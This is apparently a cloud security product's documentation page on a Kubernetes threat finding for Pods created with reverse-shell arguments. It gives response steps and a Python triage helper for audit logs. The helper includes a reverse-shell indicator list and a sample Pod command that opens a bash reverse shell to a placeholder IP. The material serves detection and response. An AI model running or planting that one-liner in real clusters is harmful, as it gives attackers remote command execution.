Execution: Kubernetes Pod Created with Potential Reverse Shell Arguments
This document describes a threat finding type in Security Command Center. Threat findings are generated by
threat detectors when they detect
a potential threat in your cloud resources. For a full list of available threat findings, see Threat findings index.
Overview
Someone created a Pod that contains commands or arguments commonly associated
with a reverse shell. Attackers
use reverse shells to expand or maintain their initial access to a cluster and
to execute arbitrary commands. For more details, see the log message for this
alert.
How to respond
The following response plan might be appropriate for this finding, but might also impact operations.
Carefully evaluate the information you gather in your investigation to determine the best way to
resolve findings.
To respond to this finding, do the following:
1. Confirm that the Pod has a legitimate reason to specify these commands and arguments.
2. Determine whether there are other signs of malicious activity from the Pod or principal in the audit logs in Cloud Logging.
3. If the principal isn't a service account (IAM or Kubernetes), contact the owner of the account to confirm whether the legitimate owner conducted the action.
4. If the principal is a service account (IAM or Kubernetes), identify the legitimacy of what caused the service account to perform this action.
5. If the Pod is not legitimate, remove it, along with any associated RBAC bindings and service accounts that the workload used and that allowed its creation.
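The triage in steps 1 through 4 starts from the pods.create audit-log entry: which command lines the Pod specified, which of them carry reverse-shell indicators, and whether the principal is a Kubernetes service account, an IAM service account, or a user. The helper below is an added example, not Security Command Center's detector or Google's code; the audit-log field layout, the indicator list and the sample entries are assumptions constructed for illustration.

```python
# Added triage helper: flags reverse-shell indicators in a Pod's container
# command/args and classifies the principal the way the response steps do.
REVERSE_SHELL_INDICATORS = ("/dev/tcp/", "nc -e", "ncat -e", "bash -i", "socat ")

def classify_principal(principal: str) -> str:
    """Map the principalEmail of an audit-log entry onto the response-plan categories."""
    if principal.startswith("system:serviceaccount:"):
        return "kubernetes-service-account"
    if principal.endswith(".gserviceaccount.com"):
        return "iam-service-account"
    return "user"

def pod_command_lines(request: dict) -> list:
    """Flatten command + args of every init container and container in the Pod spec."""
    spec = request.get("spec", {})
    containers = spec.get("initContainers", []) + spec.get("containers", [])
    return [" ".join(c.get("command", []) + c.get("args", [])) for c in containers]

def triage(entry: dict) -> dict:
    """Return what an analyst needs for steps 1-4: who created the Pod, what it runs, which indicators hit."""
    payload = entry["protoPayload"]
    principal = payload["authenticationInfo"]["principalEmail"]
    cmds = pod_command_lines(payload.get("request", {}))
    hits = sorted({ind for cmd in cmds for ind in REVERSE_SHELL_INDICATORS if ind in cmd})
    return {
        "method": payload["methodName"],
        "resource": payload["resourceName"],
        "principal": principal,
        "principal_type": classify_principal(principal),
        "command_lines": cmds,
        "indicators": hits,
        "suspicious": bool(hits),
    }

def make_entry(principal: str, pod: str, command: list) -> dict:
    """Build a constructed audit-log entry (assumed field layout, not a captured log)."""
    return {"protoPayload": {
        "methodName": "io.k8s.core.v1.pods.create",
        "resourceName": f"core/v1/namespaces/default/pods/{pod}",
        "authenticationInfo": {"principalEmail": principal},
        "request": {"spec": {"containers": [{"name": "main", "command": command}]}},
    }}

# Constructed samples: one Pod whose command matches reverse-shell patterns, one benign Pod.
SUSPICIOUS = make_entry("system:serviceaccount:default:builder", "debug-pod",
                        ["/bin/sh", "-c", "bash -i >& /dev/tcp/203.0.113.7/4444 0>&1"])
BENIGN = make_entry("alice@example.com", "web", ["nginx", "-g", "daemon off;"])
```

A hit on this list is a prompt for step 1 (confirm with the owner), not a verdict; the principal type decides whether step 3 or step 4 applies.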
What's next
- Learn how to work with threat findings in Security Command Center: /security-command-center/docs/how-to-investigate-threats
- Refer to the Threat findings index: /security-command-center/docs/threat-findings-index
- Learn how to review a finding through the Google Cloud console: /security-command-center/docs/how-to-investigate-threats#reviewing_findings
- Learn about the services that generate threat findings: /security-command-center/docs/concepts-security-sources#threats